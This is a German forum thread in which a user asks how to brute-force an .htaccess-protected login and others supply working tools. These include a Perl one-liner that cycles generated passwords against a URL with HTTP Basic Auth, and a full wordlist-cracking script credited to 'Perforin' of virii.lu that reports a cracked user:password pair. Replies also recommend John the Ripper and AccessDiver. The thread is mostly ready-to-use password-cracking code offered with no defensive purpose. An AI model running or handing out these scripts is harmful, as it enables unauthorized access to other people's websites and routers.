Hey habe Mal ne frage wie kann ich einen htaccess brute forcen ?

Ich will kein User:PW listen usen sondern bruten .
Vielen dank für euere hilfe .

Hier hast du ein Ansatz, wie man ein Bruteforcer in Perl schreibt.
Das verbunden mit einem HTTP Request würde dann ein .htaccess Bruteforcer ergeben.

perl -e '$_=a;print$_++,$/while(1);'

Also ich suche ein Prog oder ein script wie ich ein .htaccess brute forcen kann .
Leider kann ich kein perl deshalb suche ich hier nach einer anderen lösung .

Und nach was für eine anderen Lösung suchst du?

oldsch00l johnTheRipper ;D

oder AccessDiver aber sobald ich bruten hoere denn finde ich die chancen immer verschwinden gering ;P ausser der gute Admin 12345 schlägt wieder zu !

mfg n00j

johnTheRipper kenne ich der soll aber nicht gehen hab ich gelesen .


Und nach was für eine anderen Lösung suchst du?

Fertige Scripts oder Programme

Hier hast du ein fertiges Script.

perl -MLWP::UserAgent -e '$a=a;$u=LWP::UserAgent->new;while(1){$r=$u->head("http://username:".$a++."\@url");last,if($r->headers_as_string()!~/.*realm.*/)}$a--;print"pass=$a",$/'Das was fett geschrieben ist, sollte man aber noch anpassen.

hab mal auf meiner HD bissel gesucht, hier ebenfalls perl


#!/usr/bin/perl
=poc
Simple .htaccess bruteforcer. Could be usefull to crack router logins.

by Perforin
virii.lu
#vxnet

Greetings to everyone from #vxnet and EOF
=cut

use HTTP::Request;
use LWP::UserAgent;
use LWP::Simple;
use File::Temp qw(tempfile);

use strict;
use warnings;
use diagnostics;

my($ip,$user,$dic) = @ARGV;
my($fh, $tmpfile) = tempfile("X" x 23, UNLINK => 1);
my($useragent,$request,$zeile,$_,@data);


if (@ARGV < 3) { help(); }

print <<"INTRO";
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
.htaccess Bruter by Perforin
virii.lu
#vxnet
~[v1.0]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

INTRO

if ($dic =~ m/--milw0rm/i) {
print "[~] Loading milw0rm wordlist...\n";
getstore('http://milw0rm.com/mil-dic.php',$tmpfile) || die "milw0rm down?!\n";
open(DIC,"<",$tmpfile) || die "Wordlist not found or permission denied!\n";
} else {
open(DIC,"<",$dic) || die "Wordlist not found or permission denied!\n";
}

$useragent = LWP::UserAgent->new;
$request = HTTP::Request->new(GET => 'http://' . $ip);

while(<DIC>) {
chomp($_);

$request->authorization_basic($user, $_);
@data = $useragent->request($request)->as_string;

foreach $zeile (@data) {
if($zeile =~ m/401 Unauthorized/i) {
print "[~] Bruting...\n";
} else {
print "\n[!] Got login!\n";
print "[!] " . $user . ":" . $_ . "\n";
exit;
}
}
}
print "[-] Could not be cracked!\n";
close(DIC);

sub help {
print <<"HELP";
########################################
.htaccess bruter by Perforin

brute.pl 192.168.1.1 admin dic.txt
brute.pl 192.168.1.1 admin --milw0rm

###############[virii.lu]###############
HELP
exit;
}

Ein Wordlist Script ist meiner Meinung nach keine bruteforce Attacke.
Hier wurde aber explizit nach einem gefragt.
Und lieber was eigenes, dann hättest du auch gemerkt das es kei Brutforce ist.

Milw0rm ist doch auch down oder irre ich ?
wenn ich richtig liege, dann wird das script von jakuza112 nicht gehen
da es doch versucht auf milw0rms wordlist zuzugreifen ?

Das ist so nicht korrekt. Man hat die Möglichkeit --milw0rm anzugeben, damit es mit einer Wordlist von denen arbeitet.
Würde aber in diesem Fall nur zu einer Meldung kommen, dass milw0rm nicht erreichbar ist.
Aber man könnte noch seine eigene Wordlist mit angeben, dann würde es ohne Probleme funktionieren.

Auch wenn hier explizit _nicht_ nach einer Wordlist gefragt wurde.

mein fehler, tut mir leid :/

@milw0rm
jop milw0rm ist seit jahren down... team inj3ct0r führt des weiter auf 1337days.com
mfg anon_n00j

@cby...
er sucht halt wat zum cracken ;P

Google nach ´AccessDriver in 40 Schritten´

Mit einer Wordlist zu arbeiten ist ratsam, da du dir dadurch viel Zeit gegenüber Bruteforcen sparst.

@cby: Was willst du mit deinen unverständlichen Perl-Codeschnippseln bezwecken? Diese bringen hier keinem etwas und dadurch zu zeigen, was für ein Pro du bist, läuft ebenfalls ins leere.

Hm. Ich weiss nicht wo dein Problem liegt, aber ich habe nur genau die Lösung gebracht die erwartet wurde.
Aber natürlich haben Leute wie du damit ein Problem *stty